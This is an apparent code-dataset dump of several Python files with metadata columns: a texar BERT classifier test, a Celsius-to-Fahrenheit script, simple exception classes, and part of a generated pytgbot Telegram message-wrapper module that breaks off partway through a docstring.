hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8356dc9872ae7a470409d14cbf24f45790d817c7
| 6,928
|
py
|
Python
|
tests/modules/classifiers/bert_classifier_test.py
|
dyoshioka-555/texar
|
314ae5d31faef8658e9130e7686066c995d82c67
|
[
"Apache-2.0"
] | 2,325
|
2018-08-29T19:34:09.000Z
|
2022-03-26T18:11:58.000Z
|
tests/modules/classifiers/bert_classifier_test.py
|
dyoshioka-555/texar
|
314ae5d31faef8658e9130e7686066c995d82c67
|
[
"Apache-2.0"
] | 183
|
2018-08-30T02:17:45.000Z
|
2022-02-23T13:53:58.000Z
|
tests/modules/classifiers/bert_classifier_test.py
|
dyoshioka-555/texar
|
314ae5d31faef8658e9130e7686066c995d82c67
|
[
"Apache-2.0"
] | 421
|
2018-08-29T20:00:16.000Z
|
2022-03-08T13:32:03.000Z
|
"""
Unit tests for BERT classifiers.
"""
import numpy as np
import tensorflow as tf
from texar.tf.modules.classifiers.bert_classifier import BERTClassifier
from texar.tf.utils.test import pretrained_test
# pylint: disable=too-many-locals, no-member
class BERTClassifierTest(tf.test.TestCase):
"""Tests :class:`~texar.tf.modules.BERTClassifier` class.
"""
@pretrained_test
def test_model_loading(self):
r"""Tests model loading functionality."""
inputs = tf.placeholder(dtype=tf.int32, shape=[None, None])
for pretrained_model_name in BERTClassifier.available_checkpoints():
classifier = BERTClassifier(
pretrained_model_name=pretrained_model_name)
_, _ = classifier(inputs)
def test_trainable_variables(self):
"""Tests the functionality of automatically collecting trainable
variables.
"""
inputs = tf.placeholder(dtype=tf.int32, shape=[None, None])
# case 1
hparams = {
"pretrained_model_name": None,
}
clas = BERTClassifier(hparams=hparams)
_, _ = clas(inputs)
self.assertEqual(len(clas.trainable_variables), 199 + 2)
# case 2
hparams = {
"pretrained_model_name": None,
"clas_strategy": "all_time",
"max_seq_length": 8,
}
clas = BERTClassifier(hparams=hparams)
_, _ = clas(inputs)
self.assertEqual(len(clas.trainable_variables), 199 + 2)
# case 2
hparams = {
"pretrained_model_name": None,
"clas_strategy": "time_wise",
}
clas = BERTClassifier(hparams=hparams)
_, _ = clas(inputs)
self.assertEqual(len(clas.trainable_variables), 199 + 2)
def test_encode(self):
"""Tests encoding.
"""
max_time = 8
batch_size = 16
inputs = tf.random_uniform([batch_size, max_time],
maxval=30521, dtype=tf.int32)
# case 1
hparams = {
"pretrained_model_name": None,
}
clas = BERTClassifier(hparams=hparams)
logits, pred = clas(inputs)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
logits_, pred_ = sess.run([logits, pred])
self.assertEqual(logits_.shape, (batch_size,
clas.hparams.num_classes))
self.assertEqual(pred_.shape, (batch_size, ))
# case 2
hparams = {
"pretrained_model_name": None,
"num_classes": 10,
"clas_strategy": "time_wise"
}
clas = BERTClassifier(hparams=hparams)
logits, pred = clas(inputs)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
logits_, pred_ = sess.run([logits, pred])
self.assertEqual(logits_.shape,
(batch_size, max_time, clas.hparams.num_classes))
self.assertEqual(pred_.shape, (batch_size, max_time))
# case 3
hparams = {
"pretrained_model_name": None,
"num_classes": 0,
"clas_strategy": "time_wise"
}
clas = BERTClassifier(hparams=hparams)
logits, pred = clas(inputs)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
logits_, pred_ = sess.run([logits, pred])
self.assertEqual(logits_.shape,
(batch_size, max_time, clas.hparams.encoder.dim))
self.assertEqual(pred_.shape, (batch_size, max_time))
# case 4
hparams = {
"pretrained_model_name": None,
"num_classes": 10,
"clas_strategy": "all_time",
"max_seq_length": max_time
}
inputs = tf.placeholder(tf.int32, shape=[batch_size, 6])
clas = BERTClassifier(hparams=hparams)
logits, pred = clas(inputs)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
logits_, pred_ = sess.run(
[logits, pred],
feed_dict={inputs: np.random.randint(30521,
size=(batch_size, 6))})
self.assertEqual(logits_.shape, (batch_size,
clas.hparams.num_classes))
self.assertEqual(pred_.shape, (batch_size, ))
def test_binary(self):
"""Tests binary classification.
"""
max_time = 8
batch_size = 16
inputs = tf.random_uniform([batch_size, max_time],
maxval=30521, dtype=tf.int32)
# case 2
hparams = {
"pretrained_model_name": None,
"num_classes": 1,
"clas_strategy": "time_wise"
}
clas = BERTClassifier(hparams=hparams)
logits, pred = clas(inputs)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
logits_, pred_ = sess.run([logits, pred])
self.assertEqual(logits_.shape, (batch_size, max_time))
self.assertEqual(pred_.shape, (batch_size, max_time))
# case 3
hparams = {
"pretrained_model_name": None,
"num_classes": 1,
"clas_strategy": "cls_time",
"max_seq_length": max_time
}
inputs = tf.placeholder(tf.int32, shape=[batch_size, 6])
clas = BERTClassifier(hparams=hparams)
logits, pred = clas(inputs)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
logits_, pred_ = sess.run(
[logits, pred],
feed_dict={inputs: np.random.randint(30521,
size=(batch_size, 6))})
self.assertEqual(logits_.shape, (batch_size, ))
self.assertEqual(pred_.shape, (batch_size, ))
# case 4
hparams = {
"pretrained_model_name": None,
"num_classes": 1,
"clas_strategy": "all_time",
"max_seq_length": max_time
}
inputs = tf.placeholder(tf.int32, shape=[batch_size, 6])
clas = BERTClassifier(hparams=hparams)
logits, pred = clas(inputs)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
logits_, pred_ = sess.run(
[logits, pred],
feed_dict={inputs: np.random.randint(30521,
size=(batch_size, 6))})
self.assertEqual(logits_.shape, (batch_size, ))
self.assertEqual(pred_.shape, (batch_size, ))
if __name__ == "__main__":
tf.test.main()
| 34.29703
| 78
| 0.553839
| 702
| 6,928
| 5.210826
| 0.143875
| 0.059049
| 0.065063
| 0.071077
| 0.813286
| 0.813286
| 0.813286
| 0.808092
| 0.805905
| 0.766539
| 0
| 0.017916
| 0.339348
| 6,928
| 201
| 79
| 34.467662
| 0.781298
| 0.054417
| 0
| 0.771812
| 0
| 0
| 0.078878
| 0.032352
| 0
| 0
| 0
| 0
| 0.114094
| 1
| 0.026846
| false
| 0
| 0.026846
| 0
| 0.060403
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8358d0baf49a4c748406483746c60c8f791cc815
| 125
|
py
|
Python
|
Python3/ex014.py
|
neilsonfa/cursoemvideo
|
3b8995617f0ee38ac3cf74f79093a9dc6cafc6e8
|
[
"MIT"
] | null | null | null |
Python3/ex014.py
|
neilsonfa/cursoemvideo
|
3b8995617f0ee38ac3cf74f79093a9dc6cafc6e8
|
[
"MIT"
] | null | null | null |
Python3/ex014.py
|
neilsonfa/cursoemvideo
|
3b8995617f0ee38ac3cf74f79093a9dc6cafc6e8
|
[
"MIT"
] | null | null | null |
C = float(input("Qual a temperatura em graus Celsius?\n"))
print("A temperatura em graus Fahrenheit é: {}.".format(C*1.8+32))
| 62.5
| 66
| 0.704
| 22
| 125
| 4
| 0.772727
| 0.272727
| 0.318182
| 0.431818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036036
| 0.112
| 125
| 2
| 66
| 62.5
| 0.756757
| 0
| 0
| 0
| 0
| 0
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
83672dd6cef847f57ef35c39734f712aec85ea9a
| 681
|
py
|
Python
|
core/errors.py
|
rChen10/pywright
|
a71527b62c072d89c84054b0674b3a65e1227c48
|
[
"BSD-3-Clause"
] | 3
|
2016-03-16T01:10:09.000Z
|
2022-02-20T00:33:04.000Z
|
core/errors.py
|
rChen10/pywright
|
a71527b62c072d89c84054b0674b3a65e1227c48
|
[
"BSD-3-Clause"
] | 1
|
2016-03-16T01:29:57.000Z
|
2016-03-16T01:29:57.000Z
|
core/errors.py
|
rChen10/pywright
|
a71527b62c072d89c84054b0674b3a65e1227c48
|
[
"BSD-3-Clause"
] | 5
|
2016-03-21T02:48:13.000Z
|
2021-08-18T08:58:09.000Z
|
class script_error(Exception):
def __init__(self,value): self.value = value
def __str__(self): return self.value
__repr__ = __str__
class art_error(Exception):
def __init__(self,value): self.value = value
def __str__(self): return self.value
__repr__ = __str__
class markup_error(Exception):
def __init__(self,value): self.value = value
def __str__(self): return self.value
__repr__ = __str__
class file_error(Exception):
def __init__(self,value): self.value = value
def __str__(self): return self.value
__repr__ = __str__
class missing_object(script_error):
pass
class offscreen_text(script_error):
pass
| 32.428571
| 49
| 0.706314
| 88
| 681
| 4.647727
| 0.215909
| 0.264059
| 0.166259
| 0.205379
| 0.792176
| 0.792176
| 0.792176
| 0.792176
| 0.792176
| 0.792176
| 0
| 0
| 0.202643
| 681
| 20
| 50
| 34.05
| 0.753223
| 0
| 0
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.1
| 0
| 0.2
| 0.9
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 11
|
360bddaa6f4acfb557509d05868b38a2c22e74be
| 300,988
|
py
|
Python
|
code_generation/output/teleflask_messages.py
|
luckydonald/pytgbot
|
2fd6072e99f2656d335059fc0a1478b2a62f0c4c
|
[
"MIT"
] | 52
|
2015-06-25T15:48:19.000Z
|
2021-08-10T20:29:11.000Z
|
code_generation/output/teleflask_messages.py
|
luckydonald/pytgbot
|
2fd6072e99f2656d335059fc0a1478b2a62f0c4c
|
[
"MIT"
] | 16
|
2016-04-12T08:11:30.000Z
|
2021-07-22T18:00:07.000Z
|
code_generation/output/teleflask_messages.py
|
luckydonald/pytgbot
|
2fd6072e99f2656d335059fc0a1478b2a62f0c4c
|
[
"MIT"
] | 14
|
2015-06-26T15:29:48.000Z
|
2021-08-10T20:29:14.000Z
|
# -*- coding: utf-8 -*-
from luckydonaldUtils.logger import logging
from luckydonaldUtils.encoding import unicode_type, to_unicode as u
from luckydonaldUtils.exceptions import assert_type_or_raise
from pytgbot.api_types.receivable.updates import Message as PytgbotApiMessage
from pytgbot.exceptions import TgApiServerException
from pytgbot.api_types import TgBotApiObject
from pytgbot.bot import Bot as PytgbotApiBot
from abc import abstractmethod
__author__ = "luckydonald"
logger = logging.getLogger(__name__)
# noinspection PyPep8Naming
class DEFAULT_MESSAGE_ID(object):
"""
Used for reply_id.
"""
pass
# end class
class ReturnableMessageBase(object):
def _apply_update_receiver(self, receiver, reply_id):
"""
Updates `self.receiver` and/or `self.reply_id` if they still contain the default value.
:param receiver: The receiver `chat_id` to use.
Either `self.receiver`, if set, e.g. when instancing `TextMessage(receiver=10001231231, ...)`,
or the `chat.id` of the update context, being the id of groups or the user's `from_peer.id` in private messages.
:type receiver: None | str|unicode | int
:param reply_id: Reply to that `message_id` in the chat we send to.
Either `self.reply_id`, if set, e.g. when instancing `TextMessage(reply_id=123123, ...)`,
or the `message_id` of the update which triggered the bot's functions.
:type reply_id: DEFAULT_MESSAGE_ID | int | None
"""
if self.receiver is None:
self.receiver = receiver
# end if
if self.reply_id is DEFAULT_MESSAGE_ID:
self.reply_id = reply_id
# end if
# end def
@abstractmethod
def send(self, sender: PytgbotApiBot) -> PytgbotApiMessage:
try:
return self.actual_send(sender)
except TgApiServerException as e:
if e.error_code == 400 and e.description.startswith('bad request') and 'reply message not found' in e.description:
logger.debug('Trying to resend without reply_to.')
return self.actual_send(sender, ignore_reply=True)
# end if
raise e
# end try
# end def
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
raise NotImplementedError("Overwrite this function.")
# end def
def to_array(self) -> dict:
return {}
# end def
# end def
class TextMessage(ReturnableMessageBase):
"""
Use this method to send text messages. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendmessage
Parameters:
:param text: Text of the message to be sent, 1-4096 characters after entities parsing
:type text: str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param parse_mode: Mode for parsing entities in the message text. See formatting options for more details.
:type parse_mode: str|unicode
:param entities: A JSON-serialized list of special entities that appear in message text, which can be specified instead of parse_mode
:type entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param disable_web_page_preview: Disables link previews for links in this message
:type disable_web_page_preview: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, text, receiver=None, reply_id=DEFAULT_MESSAGE_ID, parse_mode=None, entities=None, disable_web_page_preview=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send text messages. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendmessage
Parameters:
:param text: Text of the message to be sent, 1-4096 characters after entities parsing
:type text: str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param parse_mode: Mode for parsing entities in the message text. See formatting options for more details.
:type parse_mode: str|unicode
:param entities: A JSON-serialized list of special entities that appear in message text, which can be specified instead of parse_mode
:type entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param disable_web_page_preview: Disables link previews for links in this message
:type disable_web_page_preview: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(TextMessage, self).__init__()
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(text, unicode_type, parameter_name="text")
self.text = text
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
self.parse_mode = parse_mode
assert_type_or_raise(entities, None, list, parameter_name="entities")
self.entities = entities
assert_type_or_raise(disable_web_page_preview, None, bool, parameter_name="disable_web_page_preview")
self.disable_web_page_preview = disable_web_page_preview
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_message(
text=self.text,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
parse_mode=self.parse_mode,
entities=self.entities,
disable_web_page_preview=self.disable_web_page_preview,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this TextMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(TextMessage, self).to_array()
array['text'] = u(self.text) # py2: type unicode, py3: type str
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['parse_mode'] = u(self.parse_mode) # py2: type unicode, py3: type str
array['entities'] = PytgbotApiBot._as_array(self.entities) # type list of MessageEntity
array['disable_web_page_preview'] = bool(self.disable_web_page_preview) # type bool
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the TextMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(TextMessage, TextMessage).validate_array(array)
data['text'] = u(array.get('text'))
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
data['entities'] = MessageEntity.from_array_list(array.get('entities'), list_level=1) if array.get('entities') is not None else None
data['disable_web_page_preview'] = bool(array.get('disable_web_page_preview')) if array.get('disable_web_page_preview') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new TextMessage from a given dictionary.
:return: new TextMessage instance.
:rtype: TextMessage
"""
if not array: # None or {}
return None
# end if
data = TextMessage.validate_array(array)
return TextMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(textmessage_instance)`
"""
return "TextMessage(text={self.text!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, parse_mode={self.parse_mode!r}, entities={self.entities!r}, disable_web_page_preview={self.disable_web_page_preview!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(textmessage_instance)`
"""
return "TextMessage(text={self.text!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, parse_mode={self.parse_mode!r}, entities={self.entities!r}, disable_web_page_preview={self.disable_web_page_preview!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in textmessage_instance`
"""
return (
key in ["text", "receiver", "reply_id", "parse_mode", "entities", "disable_web_page_preview", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class TextMessage
class PhotoMessage(ReturnableMessageBase):
"""
Use this method to send photos. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendphoto
Parameters:
:param photo: Photo to send. Pass a file_id as String to send a photo that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a photo from the Internet, or upload a new photo using multipart/form-data. The photo must be at most 10 MB in size. The photo's width and height must not exceed 10000 in total. Width and height ratio must be at most 20. More info on Sending Files »
:type photo: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param caption: Photo caption (may also be used when resending photos by file_id), 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the photo caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
